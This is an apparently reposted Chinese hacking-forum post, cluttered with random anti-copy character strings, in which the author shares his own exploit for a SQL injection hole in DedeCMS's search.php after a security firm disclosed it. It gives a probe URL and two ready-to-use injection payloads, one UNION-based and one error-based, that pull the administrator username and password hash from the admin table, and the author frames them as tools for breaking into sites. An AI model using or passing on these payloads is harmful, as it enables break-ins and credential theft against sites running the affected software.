转载不加作者名的没JJ& T& M' k1 t% q. g: r
& L9 N( t, v/ Q' W
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
! ]5 }/ A* t3 ^% A ~1 [. h& C/ L$ K& [* @
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。% M+ u! c* X$ w; _
- N1 D& w* ^, \# k( v- U) p% L
我一般是这样测试的:
3 u+ M5 ~ H2 t& A0 \ g. F3 d' w& y5 |8 a
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
, F/ E; z" M2 d; Y% Z
9 a# K( \ \9 a& X6 ?转载不加作者名的没JJ! {; Z4 o/ P; T' v. G6 x
+ O9 t8 C O1 v4 f( L! n& f作者:鬼哥; g4 g1 I- g; D* A9 u
H! h! h; ^- P: a+ S& D W1 h
$ p D6 M: }1 j3 W
1 M# ^( M5 X+ q' \+ p4 s& n
看结果如果提示
! U! G$ c0 Q" \. n* B' m- o/ t5 ]) X" K. Y& ?- `5 z
Safe Alert: Request Error step 2 !' J( f3 M1 u0 R1 N2 ^: q6 ]
& Z# i$ T3 U2 ^% C! Q" H
那么直接用下面的exp+ F, C2 q5 U5 e. u+ b" Y5 T* ?6 G
& n1 u% w, [+ z/ K% S& \
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
+ ]4 X3 Z0 P9 J" a( \
# G( T( _6 P& L5 c+ V: Q; a
, o& S) ]6 a+ p2 I# m: i4 p看结果如果提示
8 i+ m0 m; Q9 w1 l) P" D
) {- P2 X- `9 T: j fSafe Alert: Request Error step 1 !# Z4 J z$ l7 S5 Y
+ |5 m' ~ Q0 y- z- T; _1 Q% {. V那么直接用下面的exp' n1 e. p' b4 C: P6 C
7 J! R4 c5 G! ^* L$ y! t- \xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a& S3 T/ l7 W& ]
4 e5 h' b, B: ?0 k# w0 T- m% W7 p0 J+ ]/ o+ _( A# ]1 w: T$ `6 b
如果正常显示证明漏洞不存在了。
* _ }/ t2 d6 ^) t' W+ n( F/ t- \* g5 e( y! s! T- K7 q# i
转载不加作者名的没JJ |